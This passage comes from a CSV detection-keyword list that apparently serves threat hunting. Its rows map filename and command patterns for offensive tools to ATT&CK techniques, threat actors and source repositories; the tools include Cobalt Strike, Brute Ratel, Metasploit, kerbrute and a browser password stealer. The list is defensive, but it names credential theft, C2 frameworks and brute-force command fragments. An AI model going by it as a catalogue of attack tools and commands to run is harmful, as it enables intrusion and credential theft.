Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*brave* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A" +"*brave.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" +"*brc4_ldap_sentinel.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*Brc4ConfigExtractor.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Brc4DecodeString*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*breg add *HK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*breg delete *HK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*breg query *HK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*breg_add_string_value*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*bremote_exec*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*brew install sniffer*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" +"*bropper.py *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*Bropper-main.zip*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*browser.keylog_file.write*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*browser_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*browser_autopwn*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*browser_autopwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_autopwn2_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_exploit.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*browser_exploit_server_spec.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*BrowserBookmarkDiscovery_BrowserHistory.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Browser-C2.git*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" +"*Browser-C2-master.zip*","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" +"*browserexploitserver.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*BrowserGhost-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*BrowserListener.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Browser-password-stealer.git*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*Browser-password-stealer-master*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*browserpivot *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*brun_script_in_mem*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*brunasadmin*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Brute/Brute.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Brute/Brute.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*brute_force_ntlm.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*bruteforce *.txt*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*Brute-force Unsuccessful!*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*bruteforce.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*BruteForce.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*BruteforceCLSIDs.*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" +"*bruteForceCombos*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*Brute-force-Instagram-*.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" +"*bruteforce-luks -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 